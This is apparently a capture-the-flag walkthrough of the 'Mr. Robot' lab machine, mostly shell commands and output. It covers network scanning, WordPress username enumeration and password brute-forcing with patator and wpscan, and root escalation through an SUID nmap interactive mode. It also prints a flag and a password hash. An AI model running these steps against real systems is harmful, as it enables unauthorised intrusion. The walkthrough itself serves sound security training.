$ sudo arp-scan -l -I wlan0 | grep "CADMUS COMPUTER SYSTEMS" | awk '{print $1}' | xargs sudo nmap -sV
80 / tcp open http Apache httpd
443 / tcp open ssl / http apache httpd
$ ./robotscan.py -u 'http://192.168.1.29' -e txt,php -w /usr/share/dirb/wordlists/big.txt -x 403
$ curl http://192.168.1.29/key-1-of-3.txt 073403c8a58a1f80d943455fb30724b9
$ sort -u fsocity.dic > fsocity_sort.dic
PS WPScan checks the URL of the form: target_url /? Author = $ id
At the same time, by default, when logging in, the wp-login.php script returns “Invalid username” if the user is not found, and “The password you entered for the username is $ username is incorrect”
$ sudo patator http_fuzz url=http://192.168.1.29/wp-login.php method=POST body='log=FILE0&pwd=nn&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.1.29%2Fwp-admin%2F&testcookie=1' follow=1 accept_cookie=1 0=./fsocity_sort.dic -x ignore:fgrep='Invalid username'
22:28:26 patator INFO - 200 4093: 3643 0.262 | Elliot | 5474 | HTTP / 1.1 200 OK
22:28:26 patator INFO - 200 4093: 3643 0.276 | elliot | 5473 | HTTP / 1.1 200 OK
22:28:27 patator INFO - 200 4093: 3643 0.235 | ELLIOT | 5475 | HTTP / 1.1 200 OK
$ sudo ./wpscan.rb --url 192.168.1.29 --threads 50 --wordlist ./fsocity_sort.dic --username elliot
$ cat password.raw-md5 robot:c3fcd3d76192e4007dfb496cca67e13b
$ find / -perm -4000 2>/dev/null
Hacking them was easy, they used the old version of nmap 'and with the support of interactive mode, and not correctly set rights, so I easily got root access
$ nmap --interactive
Source: https://habr.com/ru/post/320106/